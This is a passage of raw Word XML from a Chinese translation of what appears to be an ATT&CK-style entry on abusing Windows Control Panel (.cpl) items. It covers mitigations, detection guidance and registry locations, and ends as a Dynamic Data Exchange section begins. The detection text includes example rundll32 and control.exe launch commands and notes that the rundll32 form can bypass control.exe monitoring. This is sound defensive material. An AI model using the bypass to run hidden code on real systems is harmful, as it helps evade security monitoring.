              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="274B0BD8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="593E87D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EEE4E9F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在适当的情况下，使用应用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows Defender Application Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）来识别并阻止可能</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶意及未知</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.cpl</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="502D13E9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05122E65" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="258A92C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将控制面板项目的存储和执行限定</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>给</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>受保护的目录，例如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>C:\Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，而不是用户目录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C61C003" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D102248" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F001346" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件相关项目的活动，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制面板进程二进制文件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>control.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Control_RunDLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ControlRunDLLAsUser API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。当从命令行执行或单击时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>control.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rundll32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>rundll32.exe shell32.dll,Control_RunDLL file.cpl</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）之前执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>control.exe file.cpl</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数直接执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，只需使用后一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rundll32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，该命令可以绕过对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>control.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的检测和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或执行过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F04CA7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>控制面板项目</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清单，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用于定位</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上未注册和可能的恶意文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB995FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可执行格式、已注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制面板项目在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CLASSES_ROOT\CLSID{{GUID}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（全局唯一标识符）和注册表项。这些注册表项可能包含控制面板项目信息，例如其显示名称，本地文件路径以及在控制面板中打开时执行的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBAD00" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制面板</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>自动显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册的控制面板项目。其他控制面板项目在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Cpls</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>Extended Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表项中有注册条目。这些条目可能包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，本地文件路径以及规范</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规范</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于以编程方式（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>WinExec("c:\windows\system32\control.exe {{Canonical_Name}}", SW_NORMAL);</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或命令行方式（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>control.exe /name {{Canonical_Name}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8CBA4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些控制面板项目可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder{{name}}\Shellex\PropertySheetHandlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中注册的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩展进行扩展，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{{name}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是系统项的预定义名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD928F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析新的控制面板项目以及磁盘上的恶意内容相关项目。可执行和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式都是兼容的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（可移植可执行）图像，可以使用传统工具和方法进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逆向工程技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08059C7F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D796D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态数据交换</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4D83A66C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
